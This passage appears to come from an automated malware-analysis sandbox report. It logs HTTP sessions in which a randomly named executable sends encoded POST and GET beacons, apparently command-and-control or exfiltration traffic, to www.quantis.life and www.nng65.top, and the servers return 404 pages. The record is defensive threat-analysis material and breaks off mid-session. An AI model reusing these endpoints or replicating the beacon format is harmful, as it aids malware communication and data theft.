                                      Data Raw: 48 32 79 34 51 32 51 38 3d 43 56 54 35 62 55 74 62 4e 44 65 74 54 43 74 59 4b 4c 48 4d 65 76 46 6e 75 47 6a 38 6e 73 46 7a 63 7a 58 71 7a 43 6f 61 45 2b 50 78 7a 7a 70 5a 5a 58 56 4d 61 51 55 43 61 38 69 43 70 63 62 70 71 44 76 49 38 72 47 55 2b 5a 4d 4a 54 64 72 38 6f 53 32 38 57 77 39 65 4b 61 36 47 71 47 30 75 46 32 55 72 5a 48 4f 56 62 2b 76 63 32 31 4f 47 51 61 49 50 7a 31 63 38 4a 77 70 6e 64 35 62 7a 31 46 76 4f 33 64 34 70 64 55 68 31 74 47 43 33 75 39 51 71 4c 47 33 62 2f 38 4a 43 78 4c 42 63 71 2b 41 53 2f 30 31 50 70 6f 44 4e 2b 32 6f 71 34 62 52 62 6a 51 76 6e 2f 2b 6a 74 62 52 48 39 51 51 3d 3d
                                      Data Ascii: H2y4Q2Q8=CVT5bUtbNDetTCtYKLHMevFnuGj8nsFzczXqzCoaE+PxzzpZZXVMaQUCa8iCpcbpqDvI8rGU+ZMJTdr8oS28Ww9eKa6GqG0uF2UrZHOVb+vc21OGQaIPz1c8Jwpnd5bz1FvO3d4pdUh1tGC3u9QqLG3b/8JCxLBcq+AS/01PpoDN+2oq4bRbjQvn/+jtbRH9QQ==
                                      Sep 22, 2024 17:36:58.961965084 CEST595INHTTP/1.1 404 Not Found
                                      Date: Sun, 22 Sep 2024 15:36:57 GMT
                                      Server: Apache
                                      X-Frame-Options: SAMEORIGIN
                                      Content-Length: 389
                                      X-XSS-Protection: 1; mode=block
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                      Sep 22, 2024 17:36:58.963428020 CEST595INHTTP/1.1 404 Not Found
                                      Date: Sun, 22 Sep 2024 15:36:57 GMT
                                      Server: Apache
                                      X-Frame-Options: SAMEORIGIN
                                      Content-Length: 389
                                      X-XSS-Protection: 1; mode=block
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                      Sep 22, 2024 17:36:58.963752985 CEST595INHTTP/1.1 404 Not Found
                                      Date: Sun, 22 Sep 2024 15:36:57 GMT
                                      Server: Apache
                                      X-Frame-Options: SAMEORIGIN
                                      Content-Length: 389
                                      X-XSS-Protection: 1; mode=block
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.1249732162.0.238.246804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:00.962979078 CEST846OUTPOST /hczh/ HTTP/1.1
                                      Host: www.quantis.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.quantis.life
                                      Referer: http://www.quantis.life/hczh/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 43 56 54 35 62 55 74 62 4e 44 65 74 54 69 64 59 49 73 72 4d 59 50 46 6f 69 6d 6a 38 75 4d 46 33 63 7a 4c 71 7a 48 49 4b 48 4e 6e 78 7a 57 56 5a 59 53 68 4d 64 51 55 43 4f 73 69 44 6b 38 62 32 71 44 71 39 38 72 4b 55 2b 5a 49 4a 54 63 62 38 6f 6c 43 39 58 67 39 59 54 4b 36 41 6e 6d 30 75 46 32 55 72 5a 44 6d 73 62 2b 33 63 32 45 2b 47 53 37 49 4d 35 56 63 37 4f 77 70 6e 50 4a 62 33 31 46 76 67 33 63 6b 50 64 53 6c 31 74 44 6d 33 76 73 51 6c 43 47 33 5a 77 63 49 32 31 35 38 32 6a 4f 30 6b 79 6e 34 71 6a 4a 6a 4d 79 51 35 77 6e 70 5a 4e 32 54 37 71 79 70 61 64 57 53 36 30 4c 57 32 44 6d 62 35 56 64 44 4f 45 57 76 58 78 4e 38 59 51 55 4d 6b 3d
                                      Data Ascii: H2y4Q2Q8=CVT5bUtbNDetTidYIsrMYPFoimj8uMF3czLqzHIKHNnxzWVZYShMdQUCOsiDk8b2qDq98rKU+ZIJTcb8olC9Xg9YTK6Anm0uF2UrZDmsb+3c2E+GS7IM5Vc7OwpnPJb31Fvg3ckPdSl1tDm3vsQlCG3ZwcI21582jO0kyn4qjJjMyQ5wnpZN2T7qypadWS60LW2Dmb5VdDOEWvXxN8YQUMk=
                                      Sep 22, 2024 17:37:01.744304895 CEST595INHTTP/1.1 404 Not Found
                                      Date: Sun, 22 Sep 2024 15:37:01 GMT
                                      Server: Apache
                                      X-Frame-Options: SAMEORIGIN
                                      Content-Length: 389
                                      X-XSS-Protection: 1; mode=block
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.1249733162.0.238.246804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:03.504765034 CEST1859OUTPOST /hczh/ HTTP/1.1
                                      Host: www.quantis.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.quantis.life
                                      Referer: http://www.quantis.life/hczh/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 43 56 54 35 62 55 74 62 4e 44 65 74 54 69 64 59 49 73 72 4d 59 50 46 6f 69 6d 6a 38 75 4d 46 33 63 7a 4c 71 7a 48 49 4b 48 4c 2f 78 7a 6b 74 5a 5a 78 4a 4d 63 51 55 43 4e 73 69 47 6b 38 61 73 71 48 2b 78 38 71 33 68 2b 62 67 4a 53 2b 54 38 75 58 71 39 65 67 39 59 4f 61 36 42 71 47 31 71 46 33 6c 67 5a 48 4b 73 62 2b 33 63 32 48 6d 47 42 4b 49 4d 32 31 63 38 4a 77 70 6a 64 35 62 54 31 46 32 64 33 63 77 35 61 69 46 31 74 69 61 33 69 2b 49 6c 4e 47 33 58 33 63 49 75 31 35 77 74 6a 4f 59 53 79 6b 6c 42 6a 4a 62 4d 68 31 49 31 31 70 52 61 67 51 65 4a 78 72 43 46 50 43 4b 45 45 46 4c 35 6f 39 4a 4c 50 51 71 47 65 34 36 63 66 4d 59 4b 4f 59 50 51 69 78 62 70 66 55 58 75 73 64 7a 45 6d 61 47 75 44 53 49 46 67 4b 6a 4f 6f 63 30 65 30 37 77 51 42 6e 4b 54 65 71 57 65 72 6d 69 61 41 6f 45 47 38 30 5a 6d 6b 36 50 74 48 64 35 38 4e 59 32 68 50 36 47 45 4a 4c 76 66 4b 6b 33 37 30 63 63 52 64 51 4b 54 4b 6d 39 38 46 69 54 33 73 76 44 36 79 56 37 4e 7a 6c 36 48 68 69 2f 33 57 38 30 38 55 [TRUNCATED]
                                      Data Ascii: H2y4Q2Q8=CVT5bUtbNDetTidYIsrMYPFoimj8uMF3czLqzHIKHL/xzktZZxJMcQUCNsiGk8asqH+x8q3h+bgJS+T8uXq9eg9YOa6BqG1qF3lgZHKsb+3c2HmGBKIM21c8Jwpjd5bT1F2d3cw5aiF1tia3i+IlNG3X3cIu15wtjOYSyklBjJbMh1I11pRagQeJxrCFPCKEEFL5o9JLPQqGe46cfMYKOYPQixbpfUXusdzEmaGuDSIFgKjOoc0e07wQBnKTeqWermiaAoEG80Zmk6PtHd58NY2hP6GEJLvfKk370ccRdQKTKm98FiT3svD6yV7Nzl6Hhi/3W808UYNc4wBJGnaaVCH28liOgvmvH2cey6G7kgP0QMKHUh43+QpUHGdiomesmvMHGAg8f85hsSBzEIoDSU80RVPrkOH/WAm/CdsDHlu2RcCIjxihYBr9Vw4sHyzcSI1whf85bT6sfeIRLfuLM5wpebPK311PsiD3QupW8qdtVKLNsK7x3S8Arh079OznnNri6XNI4vsDrECG1XTsCNABUZL0WVCc9K/DdkQk6OhTLqYCkHY9OzLUX+E9YmtPT/inFFIl1CC9v3b/qI7D3HjYqmvsb1U7MlSImICR/uCGDC6FF0ysoupcCRhXvi7yWT4m7UiVGFmjLu7T5Xr1vojdNqL9lrcT27sNI18gkyiDyjnWCH+f68S9f6McJDheAcSIWlZdCzMNnlL9VerxsBWOkYaj4L8w+kdnkv1x4cU8Hm/C8Ac8SlxJ4AbDkrIGS2zjg3NLX2fV603bLNhYHLk8UYWzfzQxSg+zeOPFZmzCQzmnQSAwZqiOFpcVp3k1Doj2cG0kXHfZ+VzZV3Yew5k14NAs8fckETyZGoa2zlnXR99yJz5ET6afl5jaql8L/QMmSy+SCWJYnBeMHSaQGqFl12gCLQIAwSVR3X4sQq4O6l5Bzwh/wvXzYhzswIrsNgBtABmyJsCpfscQkBaYG2aHTi/2t343fNBS036zRJ1 [TRUNCATED]
                                      Sep 22, 2024 17:37:04.171789885 CEST595INHTTP/1.1 404 Not Found
                                      Date: Sun, 22 Sep 2024 15:37:04 GMT
                                      Server: Apache
                                      X-Frame-Options: SAMEORIGIN
                                      Content-Length: 389
                                      X-XSS-Protection: 1; mode=block
                                      Connection: close
                                      Content-Type: text/html
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.1249734162.0.238.246804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:06.097460032 CEST554OUTGET /hczh/?H2y4Q2Q8=PX7ZYihlISWoMj5XL7HmfIBrzSHZgex3VSfo7iAvdq2Z2mw/VidHaTx6B+O6q8H9oVn81dTeg6wtRvzUgGLPdUVeFYu2umsrNDNvQmGyZ7Wn5FjCR5RM1Sg=&Bz=dVmT HTTP/1.1
                                      Host: www.quantis.life
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:37:06.830910921 CEST610INHTTP/1.1 404 Not Found
                                      Date: Sun, 22 Sep 2024 15:37:06 GMT
                                      Server: Apache
                                      X-Frame-Options: SAMEORIGIN
                                      Content-Length: 389
                                      X-XSS-Protection: 1; mode=block
                                      Connection: close
                                      Content-Type: text/html; charset=utf-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.124973538.47.233.65804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:12.062062979 CEST817OUTPOST /h709/ HTTP/1.1
                                      Host: www.nng65.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.nng65.top
                                      Referer: http://www.nng65.top/h709/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 48 33 56 78 53 64 4d 73 53 4a 7a 51 64 7a 6c 54 74 7a 4f 62 45 77 39 49 61 54 6b 6b 79 4b 6b 47 65 58 75 36 61 43 66 79 41 4a 31 59 78 42 6d 6c 62 68 70 5a 78 58 4a 2b 66 48 45 6c 2f 75 55 70 4f 69 34 4a 61 53 66 6c 58 59 62 4a 47 57 34 54 63 65 46 30 5a 67 5a 48 31 4c 66 32 59 56 61 6a 79 4d 31 44 6b 68 56 46 36 78 64 32 78 45 58 77 71 33 53 74 79 71 66 67 34 73 71 33 37 46 75 75 63 33 42 6b 31 7a 71 6e 33 39 56 61 38 51 31 5a 51 55 69 67 66 63 6d 61 73 44 58 66 69 32 53 48 2b 41 2b 51 6d 6a 52 41 2b 66 6d 50 4b 52 55 61 77 6d 31 43 2b 39 75 4a 43 52 67 38 66 48 4d 79 47 67 3d 3d
                                      Data Ascii: H2y4Q2Q8=H3VxSdMsSJzQdzlTtzObEw9IaTkkyKkGeXu6aCfyAJ1YxBmlbhpZxXJ+fHEl/uUpOi4JaSflXYbJGW4TceF0ZgZH1Lf2YVajyM1DkhVF6xd2xEXwq3Styqfg4sq37Fuuc3Bk1zqn39Va8Q1ZQUigfcmasDXfi2SH+A+QmjRA+fmPKRUawm1C+9uJCRg8fHMyGg==
                                      Sep 22, 2024 17:37:13.061850071 CEST691INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:37:12 GMT
                                      Content-Type: text/html
                                      Content-Length: 548
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.124973638.47.233.65804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:14.641808033 CEST837OUTPOST /h709/ HTTP/1.1
                                      Host: www.nng65.top
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.nng65.top
                                      Referer: http://www.nng65.top/h709/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
